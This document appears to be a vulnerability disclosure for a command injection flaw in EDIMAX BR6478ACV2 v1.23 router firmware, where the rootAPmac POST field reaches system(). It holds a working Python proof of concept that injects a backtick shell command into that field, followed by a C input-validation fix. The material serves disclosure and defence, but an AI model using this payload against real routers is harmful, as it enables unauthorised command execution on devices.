BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the formStaDrvSetup function. The variable v81 receives the rootAPmac parameter from a POST request. Because the user controls this value and it is then passed to system(), the call can cause command injection.

import requests

# Address of the router under test
ip = "192.168.2.1"

# Form fields sent to the formStaDrvSetup handler
data = {
    "stadrv_band": "0",
    "stadrv_type": "1",
    "stadrv_clonemac": "",
    "stadrv_ssid": "",
    "stadrv_encrypttype": "0",
    "iqsetupclose": "",
    "submit-url": "",
    "isApply": "",
    "WISP_enable5g": "",
    "WISP_enable2g": "",
    "wiz_wispManu": "x",
    "WISPMANU": "",
    "bindrootAPmac": "",
    # rootAPmac is the user-controlled value that reaches system()
    "rootAPmac": "'`ps>/1.txt`'",
}
url = f'http://{ip}/goform/formStaDrvSetup'
res = requests.post(url=url, data=data, verify=False)
print(res)
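
A mitigation sketch for the flaw described above, added here as an example; it is not EDIMAX's code and not part of the original report. It assumes rootAPmac is meant to carry a MAC address as 12 hex digits or six colon-separated pairs, and the names normalize_mac and accept_root_ap_mac are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not firmware code): accept only a MAC address written
 * as 12 hex digits or as six colon-separated hex pairs, and write the
 * canonical 12-digit uppercase form to out. Returns 0 on success, -1 if the
 * input contains anything else, so quotes, backticks, '>' and '/' are
 * refused before any command string could be built from the value. */
int normalize_mac(const char *in, char out[13])
{
    size_t len, i, n = 0;
    int with_colons;

    if (in == NULL)
        return -1;
    len = strlen(in);
    if (len == 12)
        with_colons = 0;
    else if (len == 17)
        with_colons = 1;
    else
        return -1;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)in[i];
        if (with_colons && i % 3 == 2) {   /* separator positions 2, 5, ... */
            if (c != ':')
                return -1;
            continue;
        }
        if (!isxdigit(c))
            return -1;
        out[n++] = (char)toupper(c);
    }
    out[n] = '\0';
    return 0;
}

/* Hypothetical handler wrapper: the request value is used only after it
 * passes validation; a rejected value never reaches system(). */
int accept_root_ap_mac(const char *param, char mac[13])
{
    if (normalize_mac(param, mac) != 0) {
        mac[0] = '\0';
        return -1;   /* respond with an error instead of configuring */
    }
    return 0;
}
```

Validation of this kind removes the shell metacharacters at the input boundary; passing the value as a separate argument to an exec-style call instead of through system() removes the shell from the path entirely.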
